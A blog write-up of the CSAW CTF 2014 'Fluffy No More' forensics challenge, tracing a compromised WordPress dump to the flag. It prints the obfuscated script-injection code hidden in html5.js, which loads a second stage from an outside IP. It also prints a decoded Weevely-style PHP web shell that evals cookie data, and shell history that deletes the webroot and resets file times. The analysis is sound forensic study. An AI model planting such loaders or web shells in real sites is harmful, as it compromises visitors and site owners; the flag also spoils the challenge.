CSAW CTF 2014 – Forensics 300 – Fluffy No More

This year I had a little bit of time to participate in NYU Poly’s Cyber Security Annual Capture the Flag event. I didn’t have much time to solve a ton of the challenges, but I did take a good look at 3 of them, two of which I was able to solve. On the third, I got everything but the very last step.

Here’s a writeup of those challenges.

Forensics 300 – Fluffy No More

(screenshot: csaw_2014_forensics_300_fluffy_no_more)

With this challenge they gave us a LOT to work with. The tar file CSAW2014-FluffyNoMore-v0.1.tar.bz2 contains the etc_directory, logs, mysql_backup, and the webroot. It’s a ton of stuff to comb through. I won’t tell you everything I looked at, because it was a lot, but I basically just started going through files that looked important.

I started with the apache log files, but there was so much there that I didn’t find anything useful. I noticed there were a lot of attempts to hack the site by visiting strange URLs, but I didn’t get anything from that. Then I looked in the website files. I noticed the most interesting file was the var/log/auth.log file.

The session that started at 19:16:34 was the most interesting (I formatted it to look nicer):

Sep 17 19:16:34 ~/CSAW2014-WordPress ; rm -rf /var/www/html/
Sep 17 19:18:11 ~/CSAW2014-WordPress/var/log/apache2 ; mv access.log error.log other_vhosts_access.log /var/log/apache2/
Sep 17 19:18:29 ~/CSAW2014-WordPress/var/www ; mv html /var/www/
Sep 17 19:18:45 ~/CSAW2014-WordPress/var/www ; chgrp -R www-data /var/www/
Sep 17 19:18:53 ~/CSAW2014-WordPress/var/www ; chmod -R 775 /var/www/
Sep 17 19:20:09 ~/CSAW2014-WordPress/var/www ; vi /var/www/html/wp-content/themes/twentythirteen/js/html5.js
Sep 17 19:20:55 ~/CSAW2014-WordPress/var/www ; find /var/www/html/ * touch {}
Sep 17 19:21:03 ~/CSAW2014-WordPress/var/www ; find /var/www/html/ * -exec touch {}
Sep 17 19:21:24 ~/CSAW2014-WordPress/var/www ; find /var/www/html/ * -exec touch {} ;
Sep 17 19:21:38 ~/CSAW2014-WordPress/var/www ; find /var/www/html/ -name * -exec touch {} ;

The important part is the line about html5.js. Someone specifically edited that file. The four find ... touch attempts that follow it (three of them with broken syntax) are an attempt to reset the modification time on every file under the webroot, so a search for recently changed files would not single html5.js out; the command history in auth.log is what gives it away.

If we look at that file, we can see it’s HTML5 Shiv. You can get the original here: HTML5 Shiv v3.7.0

If we run the diff command on these, we see what was added:

var g="ti";var c="HTML Tags";var f=". li colgroup br src datalist script option .";f = f.split(" ");c="";k="/";m=f[6];for(var i=0;i<f.length;i++){c+=f[i].length.toString();}v=f[0];x="\'ht";b=f[4];f=2541*6-35+46+12-15269;c+=f.toString();f=(56+31+68*65+41-548)/4000-1;c+=f.toString();f="";c=c.split("");var w=0;u="s";for(var i=0;i<c.length;i++){if(((i==3||i==6)&&w!=2)||((i==8)&&w==2)){f+=String.fromCharCode(46);w++;}f+=c[i];} i=k+"anal"; document.write("<"+m+" "+b+"="+x+"tp:"+k+k+f+i+"y"+g+"c"+u+v+"j"+u+"\'>\</"+m+"\>"); 

If we enter that into a browser console, it builds the IP address digit by digit from the lengths of the words in f plus two arithmetic expressions that both evaluate to 0, then uses document.write to add a script tag that loads http://128.238.66.100/analytics.js. It isn’t a redirect: the page keeps rendering and quietly pulls in a second stage.

analytics.js itself is just more encoded JavaScript:

var _0x91fe=["\x68\x74\x74\x70\x3A\x2F\x2F\x31\x32\x38\x2E\x32\x33\x38\x2E\x36\x36\x2E\x31\x30\x30\x2F\x61\x6E\x6E\x6F\x75\x6E\x63\x65\x6D\x65\x6E\x74\x2E\x70\x64\x66","\x5F\x73\x65\x6C\x66","\x6F\x70\x65\x6E"];window[_0x91fe[2]](_0x91fe[0],_0x91fe[1]);

If you run that through UnPHP.net you get:

<?  var _0x91fe=["http://128.238.66.100/announcement.pdf","_self","open"];window[_0x91fe[2]](_0x91fe[0],_0x91fe[1]); ?>

Which is a lot more readable: window.open(url, "_self") simply sends the browser to announcement.pdf. Open that and you get a fun PDF.

(screenshot: csaw_2014_forensics_300_announcement_pdf)

At this point I got stuck in a dead end. I wasn’t sure where to go. I started taking a look at the web files and found an interesting one:

/var/www/html/wp-content/uploads/wysija/themes/weblizer/template.php

which contains:

<?php
$hije = str_replace("ey","","seyteyrey_reyeeypleyaeyceye");
$andp="JsqGMsq9J2NvdW50JzskYT0kX0NPT0tJRTtpZihyZXNldCgkYSsqk9PSdoYScgJisqYgsqJsqGMoJ";
$rhhm="nsqKSwgam9pbihhcnJheV9zbGljZSgkYSwksqYygkYSksqtMykpKSksqpO2VjaG8sqgJsqzwvJy4kay4nPic7fQ==";
$pvqw="GEpPjMpeyRrPSdja2l0JztlY2hvICc8Jy4kaysq4nPicsq7ZXZhbChsqiYXNlNjRfZGVjb2RlKHByZsqWdfcmVw";
$wfrm="bGFjZShhcnsqJheSsqgsqnsqL1teXHcsq9XHNdLycsJy9ccy8nKSwgYsqXJyYXksqoJycsJyssq";
$vyoh = $hije("n", "", "nbnansne64n_ndnecode");
$bpzy = $hije("z","","zczreaztzez_zfzuznzcztzizon");
$xhju = $bpzy('', $vyoh($hije("sq", "", $andp.$pvqw.$wfrm.$rhhm))); $xhju();
?>

More encoding… fun… The three $hije(...) calls just delete junk letters to rebuild the names str_replace, base64_decode and create_function, so none of them appears in the file for a grep to find, and the four long strings are one base64 blob with "sq" sprinkled through it, split into pieces and reassembled out of order ($andp.$pvqw.$wfrm.$rhhm). Throw that into UnPHP.net again and you get:

$c = 'count';
$a = $_COOKIE;
if (reset($a) == 'ha' && $c($a) > 3) {
    $k = 'ckit';
    echo '<' . $k . '>';
    eval(base64_decode (preg_replace(array('/[^\w=\s]/', '/\s/'), array('', '+'), join(array_slice($a, $c($a) - 3)))));
    echo '</' . $k . '>';
}

A bit of digging into that and I was able to find that it matches the Weevely shell format. Weevely is currently in BackTrack and BackBox and most of the major penetration-testing Linux distros. I tried finding the key in their cookie to log into their shell, but I ran out of time.

And that’s as far as I got.

From balidani, the rest is pretty simple. Run announcement.pdf through qpdf in QDF mode, which rewrites the file with its streams decompressed so the embedded JavaScript becomes plain text:

qpdf --qdf announcement.pdf result.pdf

Then look at result.pdf in your favorite text editor and you’ll find:

var _0xee0b=["\x59\x4F\x55\x20\x44\x49\x44\x20\x49\x54\x21\x20\x43\x4F\x4E\x47\x52\x41\x54\x53\x21\x20\x66\x77\x69\x77\x2C\x20\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x20\x6F\x62\x66\x75\x73\x63\x61\x74\x69\x6F\x6E\x20\x69\x73\x20\x73\x6F\x66\x61\x20\x6B\x69\x6E\x67\x20\x64\x75\x6D\x62\x20\x20\x3A\x29\x20\x6B\x65\x79\x7B\x54\x68\x6F\x73\x65\x20\x46\x6C\x75\x66\x66\x79\x20\x42\x75\x6E\x6E\x69\x65\x73\x20\x4D\x61\x6B\x65\x20\x54\x75\x6D\x6D\x79\x20\x42\x75\x6D\x70\x79\x7D"];var y=_0xee0b[0];

A quick decode of the JavaScript and... bam! Game over.

<?  var _0xee0b=["YOU DID IT! CONGRATS! fwiw, javascript obfuscation is sofa king dumb  :) key{Those Fluffy Bunnies Make Tummy Bumpy}"];var y=_0xee0b[0]; ?>